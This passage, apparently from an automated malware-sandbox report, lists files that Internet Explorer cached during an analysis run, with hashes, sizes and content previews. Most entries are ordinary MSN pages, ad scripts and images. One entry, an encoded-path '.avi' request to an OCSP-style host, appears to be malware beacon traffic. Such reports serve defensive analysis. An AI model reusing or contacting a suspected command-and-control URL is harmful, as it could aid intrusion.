                                                                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                  Entropy (8bit):7.648838107672973
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:4Blz5F/i83HMOlt4Ol9Okcvz7v590ZIVkQ/k8xMd:4Bl9F/iCN7ikcHv5CZIbMV
                                                                                                                                                                                                  MD5:F1AEB21B524DE2509415284BB45C9D1B
                                                                                                                                                                                                  SHA1:9C5D17A573FE2DC2ACB2729381BC777C9C8474A3
                                                                                                                                                                                                  SHA-256:EFD678CBFA67BBD38DCF9BFBDBA90804EA2425B93F0A7447DACA21F9ECCCD458
                                                                                                                                                                                                  SHA-512:5FDD9593498D0C5C479CEB7CD51CE39F47F27A7ECA75D66372E9F633C5D35AC5350B6D3DBD5F3830C2F2A45E53C80340D2B3502A48CF0051D02EB13C844786CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u=true&n=true&w=30&h=30
                                                                                                                                                                                                  Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...7IDATHK.UKHUA..f........HQ((_`.K,",..P..(..ha.%QPR..B.T.Dw-2.B`..W{(..Y....K......i............{0.9.^.'HS.."t'....=u...]..!.:=.F..W.Q.M:...1.....e...bZ.4(5 .@DJ..7.....Z..&......jf.aW_.Ndj.[$.k.*.Q. .0.ot.P....pu.1.5...}.....Y...a....<..Mt......d..$>.|.g@....`...15.^..X..R=.6.Jd..y...(F..T..(.7ew.`..Ay.5.....9..d.n3....7<...^.m4.&$JH|I'].:.R....d.j.!...[i4.QT...|.......6......,g.b...."db.{..N:..sj..c..5...,ZX.a.=..*O.P*.:..7Lg.ND...<....c.9Jd.....]5R..!._..:..x..>H..!,`.;...J.#....9..Q....8....s..#DQ.u....}|k.1...e6.6p...V.q.\K....B?..=..40A....#............n._X.Z..+*.r....>>%..G]..<...:z...f.!.w<....n.Y..%g..W...G..W.......C..NKNv.....:..>...F..........7.z..<....\...;.Q..1.|..`Z.OZ.@...`.I|...^..SNe%V...<.6.....o.@#.>.~.... {......n..>@9..u._.wx.......N}..6.^.P....0....'.)........IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\FdCVaSy[1].avi
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):5
                                                                                                                                                                                                  Entropy (8bit):2.321928094887362
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3:3
                                                                                                                                                                                                  MD5:5BFA51F3A417B98E7443ECA90FC94703
                                                                                                                                                                                                  SHA1:8C015D80B8A23F780BDD215DC842B0F5551F63BD
                                                                                                                                                                                                  SHA-256:BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
                                                                                                                                                                                                  SHA-512:4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:http://ocsp.sca1b.amazontrust.com/images/pWO7gR1H/D7HcuyFwtqQyc2f7q30Sd_2/FpvO8g9Yt5/2sg_2BRDopkySLofc/dkvmiGq3mHQj/9cyQdhK_2B9/azaTrmORrQeoXS/bACWS0fxUaX55PQ_2Fz1L/SGv7j6lLaBvkjGGO/vKK54z_2Boqw2T6/kG6Y8SdQIYEyKDgkqr/xQr9PXAUv/_2FGBrMyPIWHK67_2Btq/cGu_2BgqH_2BAaZKhVo/ScaI1GsuG5Cl_2/FdCVaSy.avi
                                                                                                                                                                                                  Preview: 0....
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\auction[1].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):25470
                                                                                                                                                                                                  Entropy (8bit):5.662938434598792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:3fXz8MkD9okuXHb3GDX34pVfyz6T5ubFlE5QScMWx5KlHMRW9PpMe+UQScW9Xra1:3jkDqkmMs+ZupHdzF5WQE
                                                                                                                                                                                                  MD5:A8155C6E7EA0C348F8CC24D473863819
                                                                                                                                                                                                  SHA1:C7E079B078E1B71C4A2EF1E11DB4C88313EF4998
                                                                                                                                                                                                  SHA-256:47AC6FA729C7F1C9989CB2DCC942D13D1239FEAB65C897F057829D7AEC646381
                                                                                                                                                                                                  SHA-512:6D42F150B1A1F28787574CF4631A359B268515F78870DDA4758CE1A57B4398377BCB3A21806542A9100857A8AD44741FB0C907F4C95196C3DBF6145C68007497
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://srtb.msn.com/auction?a=de-ch&b=8dea4505950c4eeb83756ceee8c68da2&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&_=1611339398556
                                                                                                                                                                                                  Preview: .<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_07d05527262597753f6935e445f5be74_6cb0635e-91d2-46a9-914e-1972cf370fb0-tuct7041d7a_1611307002_1611307002_CIi3jgYQr4c_GLG7jf-Glejq_QEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE&quot;},&quot;tbsessionid&quot;:&quot;v2_07d05527262597753f6935e445f5be74_6cb0635e-91d2-46a9-914e-1972cf370fb0-tuct7041d7a_1611307002_1611307002_CIi3jgYQr4c_GLG7jf-Glejq_QEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE&quot;,&quot;pageViewId&quot;:&quot;8dea4505950c4eeb83756ceee8c68da2&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">.</script>.<li class="triptych serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;taboola&quot;,&quot;e&quot;:true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability="">
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\checksync[1].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20647
                                                                                                                                                                                                  Entropy (8bit):5.29809706323854
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:P9AGm6ElzD7XzeMk/lg2f5vzBgF3OZOoQWwY4RXrqt:REJDnci2RmF3OsoQWwY4RXrqt
                                                                                                                                                                                                  MD5:F469156B30F21DBBE8753F150558C99B
                                                                                                                                                                                                  SHA1:399066F1A989B29D1089995284F0F137E2AFFD7B
                                                                                                                                                                                                  SHA-256:9236F0A1E3955530ACDA603B7D05323A1F6FC90C97845C435F64F0903D681D4B
                                                                                                                                                                                                  SHA-512:97387740076877139B7D4E9CF163F38012712968259F2E20ABD7190B1F1883F99DCDBBC402FCF9AB46C49655EDBBB0FBFAA52097F57774A2A2D6BB077698FDA1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\checksync[2].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20647
                                                                                                                                                                                                  Entropy (8bit):5.29809706323854
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:P9AGm6ElzD7XzeMk/lg2f5vzBgF3OZOoQWwY4RXrqt:REJDnci2RmF3OsoQWwY4RXrqt
                                                                                                                                                                                                  MD5:F469156B30F21DBBE8753F150558C99B
                                                                                                                                                                                                  SHA1:399066F1A989B29D1089995284F0F137E2AFFD7B
                                                                                                                                                                                                  SHA-256:9236F0A1E3955530ACDA603B7D05323A1F6FC90C97845C435F64F0903D681D4B
                                                                                                                                                                                                  SHA-512:97387740076877139B7D4E9CF163F38012712968259F2E20ABD7190B1F1883F99DCDBBC402FCF9AB46C49655EDBBB0FBFAA52097F57774A2A2D6BB077698FDA1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\de-ch[1].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):419329
                                                                                                                                                                                                  Entropy (8bit):5.441127834129155
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:kJnJUKxx+VstaF1FkFQYIo4an9lqt24SydpEQOqhg0N5ruUG6BYaW4Dg9lKSL+:kJnhOVxnbSyjOqfGoElKT
                                                                                                                                                                                                  MD5:4059CAAD619DE281292E3BE6BC2571BB
                                                                                                                                                                                                  SHA1:89A9771F04EAB57052F692252D14D977188FBFAF
                                                                                                                                                                                                  SHA-256:0E127A73CC2BACF81E455F7D912662560BB9BB206252C53ECD984C227054BCB1
                                                                                                                                                                                                  SHA-512:A1FC7C92DCBB089622C8CF8BA390DD5F888BAC5F7AB99BD6332DA1E773981BBCDB354696D829DC4AD5E6F2E5824AC7C758B436BD0FB83EDEB12CE580E4522C15
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210116_30554380;a:8dea4505-950c-4eeb-8375-6ceee8c68da2;cn:15;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 15, sn: neurope-prod-hp, dt: 2021-01-06T22:59:06.6774754Z, bt: 2021-01-17T01:15:50.5620070Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-01-12 22:59:27Z;xdmap:2021-01-22 09:15:01Z;axd:;f:msnallexpusers,muidflt11cf,muidflt13cf,muidflt16cf,muidflt28cf,muidflt46cf,muidflt57cf,pneedge3cf,pnehp1cf,audexhp3cf,moneyhp3cf,bingcollabhz1cf,artgly3cf,artgly5cf,onetrustpoplive,1s-bing-news,vebudumu04302020,bbh20200521msncf,prg-sh-c;userOptOut:false;userOptOutOptions:" data-js="{&quot;dpi&quot;:1.0,&quot;ddpi&quot;:1.0,&quot;dpio&quot;:null,&quot;forcedpi&quot;:null,&quot;dms&quot;:6000,&quot;ps&quot;:1000,&quot;bds&quot
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dnserror[1]
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):2997
                                                                                                                                                                                                  Entropy (8bit):4.4885437940628465
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                                                                                                                                                                  MD5:2DC61EB461DA1436F5D22BCE51425660
                                                                                                                                                                                                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                                                                                                                                                                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                                                                                                                                                                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=0
                                                                                                                                                                                                  Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\down[1]
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):748
                                                                                                                                                                                                  Entropy (8bit):7.249606135668305
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                                                  MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                                                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                                                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                                                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                                                                                  Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\fcmain[1].js
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):36136
                                                                                                                                                                                                  Entropy (8bit):5.126316772224919
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:M1av44u3hPPoW94hhetSZ80YXf9wOBEZn3SQN3GFl295og6U0lcJ/6mU0lOsX:cQ44uR4Wmhh+SC0YXf9wOBEZn3SQN3GW
                                                                                                                                                                                                  MD5:A452AFEA6586EE3757200C5B9041D695
                                                                                                                                                                                                  SHA1:49F49118BC1F24870CD279DD53B2C69FF4E4E315
                                                                                                                                                                                                  SHA-256:5952A6D3100DEDEF9CEF244F524746F6FE2B4AF7EC2B9878FAAF09BD94ACC768
                                                                                                                                                                                                  SHA-512:28D88B196B9C4673D7DF99EBFE6293CCD7071544D8EC3406A609B0281929061BA21AA8EE55A4837C1C050763757DE8449486AC662E5F6110DD27DEF205BF1859
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1611306999574284673&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                                                                                                                                  Preview: ;window._mNDetails.initAd({"vi":"1611306999574284673","s":{"_mNL2":{"size":"306x271","viComp":"1611306888626114585","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2886937091","l2ac":""},"_mNe":{"pid":"8PO8WH2OT","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=858412214#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"858412214\",\"1611306999574284673\")) || (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\http___cdn.taboola.com_libtrc_static_thumbnails_013502cc91e63a15aacf83408e7d1426[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):12404
                                                                                                                                                                                                  Entropy (8bit):7.8043488242820755
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:BYNg7J8ODCo/RkjiDkd521irX39LIif61f:BYyF8OzYXYir9L5fa
                                                                                                                                                                                                  MD5:27B210F021AAACF75A055AE66B64BF01
                                                                                                                                                                                                  SHA1:2CB3437EF6436E7282DBA6315E7CD7024F753534
                                                                                                                                                                                                  SHA-256:A4E6EAC30C4404D69CED969DD4B6D8C5D90953A457EE907AF06198E7892CCAB5
                                                                                                                                                                                                  SHA-512:36F34EE4D3A76C9F226F263A17EE8D72EA24FF4AE5525B06F693B959EFCFD56CB5922AA7CE6781B5668A5D791C90E837A8C18017EB5FC31FD37F470FC8A1A278
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F013502cc91e63a15aacf83408e7d1426.jpg
                                                                                                                                                                                                  Preview: ......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB65_XIScheme_1200x800_1000x600_4a00409d3e303a38641ff0d1821849ca[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):11954
                                                                                                                                                                                                  Entropy (8bit):7.957977978753636
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:/8Y+3HFfDo//AWjAtfZInoySs7JQHQset9XUnKOXUL6n+3jytVQtaOuJu4VBu3:/8HFUHAcSfJyL721et9XUnKOXiC+3M0/
                                                                                                                                                                                                  MD5:BDEECD84214B507AE68632E19D95642C
                                                                                                                                                                                                  SHA1:1DD9466539102F38BEEF91E27189BFFD139EAED1
                                                                                                                                                                                                  SHA-256:38BB81DB02154998768F787186048A56BE5B40AA25492266D16AAD91F5E3366A
                                                                                                                                                                                                  SHA-512:290E84654C4996D630C897566A59D46A715171164A4E9AF3B3E1152ACCDF74AF34C2B3A0CA0D1C2B8E694159BFC1DDE9C8971BD3FBA89F614977FF6B5A94C1EC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2FTB65_XIScheme_1200x800_1000x600_4a00409d3e303a38641ff0d1821849ca.png
                                                                                                                                                                                                  Preview: ......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......7...."..........5.....................................................................n.TS..7..K..d..&.?...[...k..J*KTi.....L..N.J..6s.. ..K.7.j.Kor.hr[Ksr6.e^..]:...&P.0.qO.g.O&...k....JB.-.>..y#[q2m;.18...6..[...:(...f.......2.w...!...*...m..U...B/S..0..Q......,..rI&...X.......;.O.........G.L}J.lX.......;...>....\...\..l.......%.>..:.k.f.u...............U......wu.....b@(v..*....a265..n^.!o.i.....r.Z......g......ikd"l."..b.U:U`..0...s....8...\.5k...4U.Z.P...(3"~]pRv.... ...gy.....^.i..^..6.*.r.*5....pl.+.Q.Z..V...3.E-..Qy.L.n4..1.<...t:.f....)b2v,.<A...m."...=8....=...p....g.|...p..^........F./3.gb..~OP..K._.i...r9.P..UQg...'....~u.0[..$.F......V.W.wo.....a.BS..|BX.=8..Y.W..o+g.0XEja...z<....q.Yj.A..m.]PXtg.O..?.wA;........<#0t.9l.C..Q..3....b.2.Z..~...=.....h.,........!...vf..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\jquery-2.1.1.min[1].js
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):84249
                                                                                                                                                                                                  Entropy (8bit):5.369991369254365
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                                  MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                                  SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                                  SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                                                                                                                                  SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
                                                                                                                                                                                                  Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\log[1].gif
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):70
                                                                                                                                                                                                  Entropy (8bit):3.081640248790488
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:CUnl/RCXknEPjBnl/RCXknEn:/wknEbTwknEn
                                                                                                                                                                                                  MD5:BBC8C3F2B132103C3B5F519153C24C56
